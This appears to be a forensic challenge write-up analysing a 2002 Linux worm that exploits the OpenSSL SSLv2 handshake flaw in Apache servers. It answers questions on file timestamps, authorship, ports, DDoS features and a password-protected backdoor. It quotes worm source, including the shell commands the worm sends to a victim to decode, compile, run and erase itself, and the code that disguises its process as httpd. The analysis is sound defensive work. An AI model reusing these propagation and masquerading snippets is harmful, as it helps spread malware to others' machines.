1. Which is the type of the .unlock file? When was it generated?
Running the file command on Linux yields the answer:So, the file .unlock is a gzip compressed tar file generated at 06:59:04 the morning of September 20th, 2002.$ file .unlock .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002 , os: Unix $ gzip -l -S "" .unlock compressed uncompressed ratio uncompressed_name 17973 81920 78.0% .unlock $ mv .unlock .unlock.Z $ gunzip .unlock.Z $ file .unlock .unlock: GNU tar archive
2. Based on the source code, who is the author
of this worm? When it was created? Is it compatible with the date
from question 1?
To answer this question, I first looked at the table of contents of the unziped tar file:So, the timestamp of the source files are 2002-09-20 09:28:11 and 2002-09-19 17:57:48 which do not correspond to the date from question 1, since 2002-09-20 09:28:11 is later than Fri Sep 20 06:59:04 2002. This difference could be explained by the gzip file being generated on a different machine from the source code. Perhaps a badly set clock, or a difference in time zones between two computers accounts for the difference?$ tar tvf .unlock -rw-r--r-- root/wheel 70981 2002-09-20 09:28:11 .unlock.c -rw-r--r-- root/wheel 2792 2002-09-19 17:57:48 .update.cThe comments at the beginning of the .unlock.c file indicate that the worm was written by aion@ukr.net and contem@efnet. I suspect aion@ukr.net wrote most of the "worm" code, with the DDoS code written by contem@efnet.
3. Which process name is used by the worm
when it is running?
The worm uses the process name httpd when running. We know this because of lines 78, 1803 through 1805 of the file .unlock.c:The code above re-writes the process name and its single argument with null characters, then writes the value of the macro PSNAME to the process name, which in this case is httpd . Note that in line 1425 of the .unlock.c file, the process on a target computer is first started as:78:#define PSNAME "httpd " 1803: for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; 1804: for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; 1805: strcpy(argv[0],PSNAME);and ultimately re-writen as:/tmp/httpd {IP address of attacker}httpd
4. In wich format the worm copies itself to
the new infected machine? Which files are created in the whole process?
After the worm executes itself, wich files remain on the infected machine?
The code block beginning at line 1416 of .unlock.c gives us the answers:In the code above, we see the worm writing the output of the encode function to the file /tmp/.unlock.uu on the target machine, then using the target machine's uudecode command to generate /tmp/.unlock. The file /tmp/.unlock, a gziped tar file, is then extracted to produce the the C source files /tmp/.unlock.c and /tmp/.update.c, which are in turn compiled to /tmp/httpd and /tmp/update respectively. The worm then runs the the two compiled binaries, and deletes all files except /tmp/.unlock. Only /tmp/.unlock remains on the machine.writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n"); zhdr(1); encode(sockfd); zhdr(0); writem(sockfd,"__eof__\n"); writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; " "tar xzf /tmp/.unlock -C /tmp/; " "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; " "gcc -o /tmp/update /tmp/.update.c;\n"); sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip); writem(sockfd,rcv); sleep(3); writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c " " /tmp/httpd /tmp/update; exit; \n");The above process corresponds to the code in the encode function. The encode function uuencodes whatever is defined as WORMSRC, in this case, /tmp/.unlock. If this file is missing, then the worm cannot propagate.
5. Which port is scanned by the worm?
The worm does a TCP scan of port 80. This is evident from the call to the atcp_connect function with the SCANPORT parameter, a macro defined to be 80.
6. Which vulnerability the worm tries to exploit?
In which architectures?
The worm tries to exploit the OpenSSL SSLv2 Handshake vulnerability. The vulnerability is discussed in CERT Vulnerability note #102795 .From line 1241 of the .unlock.c file, we see the array architectures of type struct archs that defines the Linux distribution and corresponding Apache versions that the worm targets. They are:
Linux Distro Apache Version Gentoo unknown Debian 1.3.26 Red-Hat 1.3.6 Red-Hat 1.3.9 Red-Hat 1.3.12 Red-Hat 1.3.19 Red-Hat 1.3.20 Red-Hat 1.3.22 Red-Hat 1.3.23 Red-Hat 1.3.26 SuSE 1.3.12 SuSE 1.3.17 SuSE 1.3.19 SuSE 1.3.20 SuSE 1.3.23 Mandrake 1.3.14 Mandrake 1.3.19 Mandrake 1.3.20 Mandrake 1.3.23 Slackware 1.3.26
7. What kind of information is sent by the
worm by email? To which account?
When the worm first infects a computer, it makes an SMTP connection to the mail server freemail.ukr.net and sends an e-mail with from address test@microsoft.com to the account aion@ukr.net. The e-mail contains the hostid and the hostname of the newly infected computer, along with the IP address of the computer that did the infecting (ie. the attacking machine). The code that does this is in the mailme function of the .unlock.c file.
8. Which port (and protocol) is used by the
worm to communicate to other infected machines?
The worm uses UDP port 4156 to communicate with other infected machines. It also uses UDP port 10100 to transmit e-mail addresses collected from all filesystems mounted on the infected machine, except /proc, /dev, and /bin, if directed to do so.
9. Name 3 functionalities built in the worm
to attack other networks.
Among the many functionalities of this worm are UDP flood, TCP flood, and DNS flood. In a directive to attack, the worm will get the target, port (if applicable), and a duration of time to attack. These values are stored in records of type "*_rec", as defined in .unlock.c. Whenever the worm gets a command to attack, it will relay the command to other infected hosts it knows about.
10. What is the purpose of the .update.c
program? Which port does it use?
The .update.c program is a backdoor that listens on TCP port 1052, as defined by the PORT macro. The backdoor requires the password aion1981.
11. Bonus Question:
What is the purpose of the SLEEPTIME
and UPTIME values in the .update.c program?
The UPTIME value is used to determine for how long the backdoor will stay bound and listening on the port PORT before closing all sockets and sleeping for SLEEPTIME seconds. The backdoor program runs in a continuous loop, listening for 10 seconds, then sleeping for 5 minutes.